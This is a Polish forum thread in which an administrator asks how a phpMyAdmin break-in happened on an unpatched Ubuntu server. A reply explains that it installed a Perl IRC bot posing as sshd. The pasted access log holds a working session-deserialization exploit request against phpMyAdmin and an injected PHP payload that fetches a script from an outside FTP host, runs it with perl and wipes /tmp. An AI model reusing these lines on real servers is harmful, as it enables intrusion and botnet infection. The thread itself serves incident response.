Pokaż wyniki 1 do 3 z 3

Temat: phpmyadmin - wlamanie - zabezpieczenie

  1. #1
    Zarejestrowany
    Apr 2012
    Postów
    1

    Question phpmyadmin - wlamanie - zabezpieczenie

    Witam,
    na początku powiem, że nie miałm do kogo się zwróć więc piszę tu. :-)

    wydaje mi się, że włamania dokonano przez phpmyadmin (przynajmniej tak wnioskuje z logów). Dodadam, że serwer nie był aktualizowany i jest to wersja ubuntu 9.04 (powoli go przenosze na Debiana).
    Po zalogowoaniu zauważyłem 2x sshd oraz "klog -x" był uruchomiony z użytkownika www-data.

    Po zrobieniu url decode otrzymałem wynik podany poniżej(chiałem dodać jako załącznik ale niestety nie mam możliwości, wyświetla mi się pusta strona).

    Chciałbym się dowiedzieć jak można się zabezpieczyć? I czy sama aktualizacja pomoże? Czy to jest jakiś bug w phpmyadmin czy może w samym systemie? Tak czy siak muszę od nowa postawić bo nie wiem co tak do końca zostało zmodyfikowane.


    Będę wdzięczny za informacje.

    66.221.192.4 - - [10/Apr/2012:17:34:57 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=74ffaa8f9bfa6 cc5f141994531858d18&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s :50:"/tmp/sess_74c6a497fdd5817e05003c9cbde76b2245567918";}} HTTP/1.1" 200 775 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:34:58 -0500] "GET /phpmyadmin/index.php/index.php?token=74ffaa8f9bfa6cc5f141994531858d18 HTTP/1.1" 200 8414 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:34:58 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=74ffaa8f9bfa6 cc5f141994531858d18&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s :54:"/var/tmp/sess_74c6a497fdd5817e05003c9cbde76b2245567918";}} HTTP/1.1" 200 867 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:34:59 -0500] "GET /phpmyadmin/index.php/index.php?token=74ffaa8f9bfa6cc5f141994531858d18 HTTP/1.1" 200 8506 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:35:00 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=74ffaa8f9bfa6 cc5f141994531858d18&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s :58:"/var/lib/php/sess_74c6a497fdd5817e05003c9cbde76b2245567918";}} HTTP/1.1" 200 867 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:35:01 -0500] "GET /phpmyadmin/index.php/index.php?token=74ffaa8f9bfa6cc5f141994531858d18 HTTP/1.1" 200 8506 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:35:01 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=74ffaa8f9bfa6 cc5f141994531858d18&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s :59:"/var/lib/php4/sess_74c6a497fdd5817e05003c9cbde76b2245567918";}} HTTP/1.1" 200 867 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:35:02 -0500] "GET /phpmyadmin/index.php/index.php?token=74ffaa8f9bfa6cc5f141994531858d18 HTTP/1.1" 200 8506 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:35:03 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=74ffaa8f9bfa6 cc5f141994531858d18&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s :59:"/var/lib/php5/sess_74c6a497fdd5817e05003c9cbde76b2245567918";}} HTTP/1.1" 200 867 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:35:04 -0500] "GET /phpmyadmin/index.php/index.php?token=74ffaa8f9bfa6cc5f141994531858d18 HTTP/1.1" 200 43562 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
    66.221.192.4 - - [10/Apr/2012:17:15:35 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=be909249fcdf9 1089efe7dd100dfca49&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s :59:"/var/lib/php5/sess_ed48bb3784d8d9d70f7a3708439db3b0b7251f1c";}}& _SESSION[payload]=<?php
    echo exec('cd /tmp;rm -rf *;killall -9 perl;wget ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo exec('cd /tmp;rm -rf *;curl -O ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo exec('cd /tmp;rm -rf *;fetch ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo exec('cd /tmp;rm -rf *;lwp-download ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo exec('cd /tmp;rm -rf *;lynx -DUMP ftp://wn:[email protected]/grt.txt >gthhefv.txt;perl gthhefv.txt;rm -rf *');

    echo passthru('cd /tmp;rm -rf *;killall -9 perl;wget ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo passthru('cd /tmp;rm -rf *;curl -O ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo passthru('cd /tmp;rm -rf *;fetch ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo passthru('cd /tmp;rm -rf *;lwp-download ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo passthru('cd /tmp;rm -rf *;lynx -DUMP ftp://wn:[email protected]/grt.txt >gthhefv.txt;perl gthhefv.txt;rm -rf *');

    echo system('cd /tmp;rm -rf *;killall -9 perl;wget ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo system('cd /tmp;rm -rf *;curl -O ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo system('cd /tmp;rm -rf *;fetch ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo system('cd /tmp;rm -rf *;lwp-download ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo system('cd /tmp;rm -rf *;lynx -DUMP ftp://wn:[email protected]/grt.txt >gthhefv.txt;perl gthhefv.txt;rm -rf *');

    echo shell_exec('cd /tmp;rm -rf *;killall -9 perl;wget ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo shell_exec('cd /tmp;rm -rf *;curl -O ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo shell_exec('cd /tmp;rm -rf *;fetch ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo shell_exec('cd /tmp;rm -rf *;lwp-download ftp://wn:[email protected]/grt.txt;mv grt.txt gthhefv.txt;perl gthhefv.txt;rm -rf *');
    echo shell_exec('cd /tmp;rm -rf *;lynx -DUMP ftp://wn:[email protected]/grt.txt >gthhefv.txt;perl gthhefv.txt;rm -rf *');

    ?> HTTP/1.1" 200 339437 "http://my.ip.add.ress/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"

  2. #2
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Nie mam pytan... to te gowna nadal robia rundy po sieci?!
    Od 2006 roku widze te same skrypty w uzyciu, z malenkimi modyfikacjami od czasu do czasu ;-)

    To nie jest sshd, to jest bot IRC napisany w perlu, ktory odpala sie i udaje ze jest sshd ale tak na prawde laczy sie do serwera IRC i przyjmuje polecenia od adminow kanalu. Zablokuj polaczenia wychodzace do 46.166.147.33:80 i ten konkretny bot przestanie robic problemy...

    ... a tak na serio, lepiej zalatal oprogramowanie bo bot szuka miedzy innymi dziurawego Mambo (takie cos co istnialo dobre 2-3 lata przed Joomla)...
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  3. #3
    Zarejestrowany
    Apr 2012
    Postów
    1

    Domyślnie Tqm

    Tqm mam do ciebie sprawe prosze konttakt

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52